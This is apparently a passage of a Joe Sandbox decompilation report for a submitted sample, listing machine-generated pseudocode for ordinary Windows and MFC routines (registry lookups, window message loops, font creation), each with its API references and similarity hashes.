				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E00405303();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E0041E5DF(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E00403667(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E0040352C( &_v16,  *(_t100 + 0x54));
						_push(0x435478);
						_push( &_v16);
						_push( &_v36);
						_t54 = E0040541E(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E0040541E(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E00403036(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E00405482(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E00405482(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E00403036( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E00403036( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_t6 =  &_v280; // 0x4423e8
						_v280 = 0x442480;
						E0041F7F4(_t6, 0x43c590);
						asm("int3");
						_push(4);
						E0041F6EA(E00431BFC, _t79, 0, _t100);
						_t94 = E0040F014(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E0040D519(_t94);
						}
						return E0041F7C2(_t77);
					}
				}
			}

0x00405591
0x00405591
0x00405591
0x00405598
0x0040559c
0x004055a3
0x004055a9
0x004055b0
0x004055b7
0x004055b9
0x004055bc
0x004055bf
0x004055c6
0x004055c9
0x004055cb
0x004055cb
0x004055ce
0x004055cf
0x004055d1
0x004055d6
0x004055d8
0x004055da
0x004055e1
0x004055e3
0x004055e3
0x004055e6
0x004055e6
0x004055cb
0x004055eb
0x004055ee
0x004056cb
0x004056d1
0x004056d9
0x004056da
0x004056db
0x004056e4
0x004056e9
0x004056f0
0x004055f4
0x004055f6
0x004055fc
0x004055fe
0x00405605
0x0040560d
0x00405618
0x0040561b
0x00405620
0x00405628
0x0040562c
0x0040562d
0x00405632
0x00405635
0x00405639
0x0040563d
0x0040563e
0x0040564c
0x00405650
0x00405658
0x0040565e
0x0040565f
0x0040566c
0x00405672
0x00405674
0x00405689
0x0040568e
0x00405693
0x00405694
0x00405695
0x00405695
0x0040569d
0x0040569d
0x004056af
0x004056bb
0x004056c3
0x004056c6
0x00000000
0x00405600
0x004037e3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b
0x004055fe

APIs

__EH_prolog3.LIBCMT ref: 004055B0
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0040566C
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00405683
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 0040569D
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004056AF

Strings

Software\, xrefs: 00405605

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
Instruction ID: c7b39df0023e7795f59702957f2174eef86f6ceff4bf1e696be6c37735e09762
Opcode Fuzzy Hash: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
Instruction Fuzzy Hash: E141AB31900509ABCB21EBA5CC41AFFBBB9EF48314F10093BE551F22D1DB799A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040982D, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040982D(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E0040C981(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E00404C27(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E0040501F(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E0040CA4F(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E00404F39(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E00403CEC();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E0040CA4F(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

0x0040982d
0x00409836
0x0040983e
0x00409840
0x00409844
0x00409848
0x00409856
0x00409856
0x0040985b
0x00409861
0x00409865
0x00409869
0x0040986e
0x00409874
0x004098ec
0x004098ec
0x004098ec
0x004098f0
0x00000000
0x00000000
0x00409888
0x0040988a
0x004098f2
0x004098f2
0x004098f2
0x004098f9
0x00000000
0x00000000
0x004098fd
0x00409903
0x0040990b
0x00409918
0x00409920
0x00409922
0x00409922
0x0040990b
0x00409926
0x00409928
0x0040992e
0x00409930
0x0040996b
0x0040996b
0x0040996b
0x00000000
0x00409932
0x00409936
0x0040993d
0x0040993e
0x00409940
0x00409948
0x00409948
0x0040995c
0x00000000
0x0040995e
0x00000000
0x0040995e
0x0040995c
0x00409930
0x00409960
0x00409961
0x00000000
0x00409966
0x0040988c
0x0040988e
0x00409892
0x00409894
0x0040989c
0x0040989e
0x0040989e
0x0040989e
0x004098a0
0x004098a5
0x004098a7
0x004098ab
0x004098ad
0x004098b1
0x004098c0
0x004098c0
0x004098b1
0x004098ab
0x004098c6
0x004098cb
0x004098e8
0x004098e8
0x00000000
0x004098cd
0x004098da
0x004098e0
0x004098e4
0x004098e6
0x00000000
0x00000000
0x00000000
0x004098e6
0x004098cb
0x00000000

APIs

GetParent.USER32(?), ref: 0040985B
PeekMessageA.USER32 ref: 00409882
UpdateWindow.USER32(?), ref: 0040989C
SendMessageA.USER32(?,00000121,00000000,?), ref: 004098C0
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004098DA
UpdateWindow.USER32(?), ref: 00409920
PeekMessageA.USER32 ref: 00409954

Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
Instruction ID: 3594d42317ffdf77eda035bd5be05eb9f6962faab1b0a5bda36925cf630a621a
Opcode Fuzzy Hash: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
Instruction Fuzzy Hash: 5B41BF712147419BDB21AF26CC84A2BBBE4FFC1B54F04493EF481A12E2D779DD04DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00404592, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404592(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E00403ED6();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E0040DB94(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E0040AF20(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E0040AF20(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E0040AF65(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E0040AF20(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_t2 =  &_v28; // 0x4423e8
						_v28 = 0x442480;
						E0041F7F4(_t2, 0x43c590);
						asm("int3");
						_push(4);
						E0041F6EA(E00431BFC, _t37, _t46, _t51);
						_t43 = E0040F014(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E0040D519(_t43);
						}
						return E0041F7C2(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

0x00404592
0x00404592
0x00404592
0x00404597
0x004045b2
0x004045b4
0x004045b6
0x004045c1
0x004045c7
0x004045c9
0x004045cb
0x004045cc
0x0040f9e7
0x0040f9e9
0x0040f9ec
0x0040f9ee
0x0040fa10
0x00000000
0x0040f9f0
0x0040f9f0
0x0040f9f5
0x0040f9f7
0x0040fa08
0x0040fa08
0x0040fa0f
0x0040fa0f
0x004045ce
0x0040f948
0x0040f948
0x0040f949
0x0040f94a
0x0040f94b
0x0040f94c
0x0040f94d
0x0040f951
0x0040f957
0x0040f95d
0x0040f976
0x0040f976
0x0040f978
0x0040f97a
0x00000000
0x00000000
0x0040f96a
0x0040f96c
0x0040f96e
0x0040f9e0
0x0040f9e5
0x0040f970
0x0040f971
0x00000000
0x0040f971
0x00000000
0x0040f96e
0x0040f97c
0x0040f994
0x0040f994
0x0040f996
0x0040f998
0x00000000
0x00000000
0x0040f988
0x0040f98a
0x0040f98c
0x00000000
0x0040f98e
0x0040f98f
0x00000000
0x0040f98f
0x00000000
0x0040f98c
0x0040f99a
0x0040f99e
0x0040f9a3
0x0040f9a5
0x0040f9af
0x0040f9c6
0x0040f9c6
0x0040f9c8
0x0040f9ca
0x0040f9cb
0x00000000
0x00000000
0x0040f9ba
0x0040f9bc
0x0040f9be
0x0040f9c1
0x00000000
0x0040f9c1
0x00000000
0x0040f9be
0x0040f9de
0x00000000
0x0040f9a7
0x00000000
0x0040f9a7
0x0040f9a5
0x004045b8
0x004037e3
0x004037e3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b
0x00404599
0x00404599
0x0040459e
0x00000000
0x004045a5
0x004045ab
0x004045ab
0x00000000

APIs

GetCapture.USER32 ref: 0040F951
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F96A
GetFocus.USER32 ref: 0040F97C
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F988
GetLastActivePopup.USER32(?), ref: 0040F9AF
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F9BA
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0040F9DE

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
Instruction ID: 6bbcefccedb64782f514be833ccaebf9a4cac9621966bdcb030a22abc8cdc0d5
Opcode Fuzzy Hash: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
Instruction Fuzzy Hash: 9C31D5B1700215BBDA316B25DC84F7B76ACAB85798B11003BF501F76D0CB3DEC0596AA

Uniqueness

Uniqueness Score: -1.00%

Function 00409DC5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409DC5(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E00404C1E();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0040DBC7(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E0041F330(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E00409BF3(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E00409D11(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x00409dce
0x00409dd5
0x00409ddb
0x00409de0
0x00409e05
0x00409e05
0x00409e0b
0x00409e0d
0x00409e0d
0x00409e0b
0x00409e10
0x00409e15
0x00409e19
0x00409e1c
0x00409e1c
0x00409e1f
0x00409e27
0x00409e2c
0x00409e2c
0x00409e2f
0x00409e33
0x00409e36
0x00409e3d
0x00409e42
0x00409e44
0x00409e48
0x00409e52
0x00409e57
0x00409e5d
0x00409e60
0x00409e71
0x00409e78
0x00409e7b
0x00409e7b
0x00409e48
0x00409e42
0x00409e91
0x00409e93
0x00409ea2
0x00409eae
0x00409eb2
0x00409eba
0x00409eba
0x00409eb2
0x00409ec2
0x00409ed5

APIs

_memset.LIBCMT ref: 00409E52
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00409E7B
GetWindowLongA.USER32 ref: 00409E8D
GetWindowLongA.USER32 ref: 00409E9E
SetWindowLongA.USER32 ref: 00409EBA

Strings

(, xrefs: 00409E71

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
Instruction ID: 9e45313b090639f1ad71dca0b70a2556c303530e875c3b0a022525267220ac75
Opcode Fuzzy Hash: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
Instruction Fuzzy Hash: 7E3190716003109FDB20EFA9C884A6FB7B5BF88315B15053EE545A76D2DB39EC40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00412822, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00412822(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E0041F753(E00432C16, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361e8;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					_t6 = _t91 - 0x54; // 0x4361e8
					if(E00411C82(_t6, 0x11) != 0) {
						L5:
						_t9 = _t91 - 0x54; // 0x4361e8
						_t49 = _t9;
						goto L6;
					} else {
						_t7 = _t91 - 0x54; // 0x4361e8
						if(E00411C82(_t7, 0xd) != 0) {
							goto L5;
						} else {
							 *((intOrPtr*)(_t90 + 0x64)) = 0;
						}
					}
				} else {
					L6:
					GetObjectA( *(_t49 + 4), 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E004036AB(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E0040E75E(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E0040ED13(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x439480, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E0040E7B2(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E00403036( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				_t45 = _t91 - 0x54; // 0x4361e8
				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361d8;
				E0040E956(_t45);
				return E0041F7D6(_t74, 0, _t90);
			}

0x00412822
0x00412822
0x0041282c
0x00412831
0x00412836
0x00412838
0x0041283b
0x00412844
0x00412847
0x00412850
0x0041285a
0x00412872
0x00412872
0x00412872
0x00000000
0x0041285c
0x0041285e
0x00412868
0x00000000
0x0041286a
0x0041286a
0x0041286a
0x00412868
0x00412875
0x00412875
0x0041287e
0x00412887
0x0041288b
0x00412892
0x0041289a
0x004128a1
0x004128aa
0x004128b2
0x004128b9
0x004128c0
0x004128c3
0x004128c6
0x004128c8
0x004128cc
0x004128ce
0x004128d2
0x004128d2
0x004128dd
0x004128ea
0x004128f4
0x004128f8
0x004128fe
0x004128ff
0x00412901
0x00412905
0x00412908
0x0041290b
0x00412916
0x0041291a
0x00412920
0x00412922
0x00412924
0x00412924
0x0041292c
0x00412930
0x00412938
0x0041293b
0x0041293b
0x00412940
0x00412944
0x00412947
0x0041294e
0x00412958

APIs

__EH_prolog3_GS.LIBCMT ref: 0041282C
GetObjectA.GDI32(?,0000003C,?), ref: 0041287E
GetDeviceCaps.GDI32(?,0000005A), ref: 004128EE
OleCreateFontIndirect.OLEAUT32(00000020,00439480), ref: 0041291A

Strings

aC, xrefs: 00412850
, xrefs: 0041288B

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID: $aC
API String ID: 2429671754-2144110735
Opcode ID: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
Instruction ID: e04894aa077b9c1b9b57ffa01989e5e100f7f590183dedbf99927f803ccce2ea
Opcode Fuzzy Hash: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
Instruction Fuzzy Hash: 00418D74E012499EDB10DFE6C945ADCFBF4AF58304F10816BE455E72A2E7B88A84CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABD, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404ABD(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x443590; // 0xa920217c
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_t4 =  &_v172; // 0x4423e8
					_v172 = 0x442480;
					E0041F7F4(_t4, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, _t38, _t42, _t43);
					_t40 = E0040F014(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E0040D519(_t40);
					}
					return E0041F7C2(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
